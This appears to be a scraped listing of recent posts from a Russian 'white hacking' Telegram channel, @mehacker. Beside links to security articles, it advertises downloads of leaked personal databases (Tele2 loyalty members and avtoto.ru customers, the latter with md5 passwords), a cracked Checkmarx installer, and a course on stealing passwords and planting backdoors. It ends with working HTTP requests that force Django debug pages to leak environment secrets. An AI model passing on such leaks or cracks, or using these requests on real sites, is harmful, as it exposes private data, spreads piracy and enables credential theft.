Получи случайную криптовалюту за регистрацию!

/me ᕼᗩᑕKEᖇ

Логотип телеграм канала @mehacker — /me ᕼᗩᑕKEᖇ M
Логотип телеграм канала @mehacker — /me ᕼᗩᑕKEᖇ
Адрес канала: @mehacker
Категории: Технологии
Язык: Русский
Количество подписчиков: 2.04K
Описание канала:

Канал IT направления.
Новости и курьёзные случаи в кибер пространстве.
Белый хакинг и аудит безопасности.
@matrixleak

Рейтинги и Отзывы

3.50

2 отзыва

Оценить канал mehacker и оставить отзыв — могут только зарегестрированные пользователи. Все отзывы проходят модерацию.

5 звезд

1

4 звезд

0

3 звезд

0

2 звезд

1

1 звезд

0


Последние сообщения 2

2022-08-22 23:35:56 HTTP-сервер с шифрованием TLS на Kali Linux за 5 минут

Подробнее
430 views20:35
Открыть/Комментировать
2022-08-22 23:35:01 Как создать простое зашифрованное сообщение с помощью командной строки на Linux

Подробнее
385 views20:35
Открыть/Комментировать
2022-08-22 12:41:41 Дальше в лес. Как работают атаки на доверенные отношения доменов и лесов AD

Посмотреть в формате PDF
407 views09:41
Открыть/Комментировать
2022-08-22 12:40:17 HTB Retired. Пишем эксплоит ROP + mprotect и используем переполнение буфера

Продолжение

Посмотреть в формате PDF
384 views09:40
Открыть/Комментировать
2022-08-16 21:56:24
Visadi Khalikov - Этичный хакинг с Metasploit для начинающих (2020)

Мы рассмотрим функционал на примере последующих уроков.
Сканирование системы. Сканирование - это очень важный этап в хакинге. С помощью него мы узнаем какие службы/программы запущены на данный момент, тип операционной системы, а также те или иные уязвимости (слабости) в программном обеспечении тестируемой системы.
Взлом системы. С помощью собранной на предыдущем этапе информации мы осуществим взлом системы различными способами и получим полный доступ к компьютеру жертвы.
Получение необходимых данных со взломанной системы. На данном этапе мы реализуем ту цель, ради которой взламывали систему. Например, следующее:
Получение паролей
Слежение за пользователем
Получение необходимых файлов
Установка бэкдора для последующего доступа

ссылка:
https://cloud.mail.ru/public/Vya9/DET8ht5zu
648 views18:56
Открыть/Комментировать
2022-08-15 10:00:21 Программа лояльности Tele2
Имя, номер, почта
7 миллионов строк

Скачать
575 views07:00
Открыть/Комментировать
2022-08-15 09:59:57 База avtoto.ru
Номер, почта, ФИО, адрес, пароль (md5)
500к

Скачать
548 views06:59
Открыть/Комментировать
2022-08-13 18:35:54 Как написать правила для Checkmarx и не сойти с ума

Прочитать
593 views15:35
Открыть/Комментировать
2022-08-13 18:35:13 CheckMarx 9.5.0 Installer & Crack

#security #CxSAST #CheckMarx
493 views15:35
Открыть/Комментировать
2022-08-11 19:24:36 Приложения на Django в debug режиме раскрывают содержимое environment переменных при необработанном исключении.
Несмотря на наличие автоматического сокрытия значений, для переменных соответствующих регулярному выражению API|TOKEN|KEY|SECRET|PASS|SIGNATURE, часто это приводит к утечкам через нестандартные имена переменных.

Если обнаружить debug режим можно просто обратившись к несуществующей странице, то вызвать exception иногда бывает проблематично. Даже с раскрытием существующих в приложении путей через 404-ую страницу.
Но существуют и более универсальные подходы.

Пример 1
Нестандартные символы в Host. Правда с учетом облачных сервисов этот вариант срабатывает редко.

GET / HTTP/1.1
Host: '"

Invalid HTTP_HOST header: '\'"'. The domain name provided is not valid according to RFC 1034/1035.

Пример 2
Использование большего количества переменных в POST, чем указано в настройке DATA_UPLOAD_MAX_NUMBER_FIELDS (по умолчанию 1000).
Для эксплуатации необходимо найти любой роут, поддерживающий POST запросы, и в редких случаях получить валидное значение CSRF токена на странице.

POST / HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Cookie: csrftoken=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;
Content-Length: 3093

csrfmiddlewaretoken=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&x=&x=&x=&x=[..1000 раз..]&x=&x=&x=

(с) ковычка
580 views16:24
Открыть/Комментировать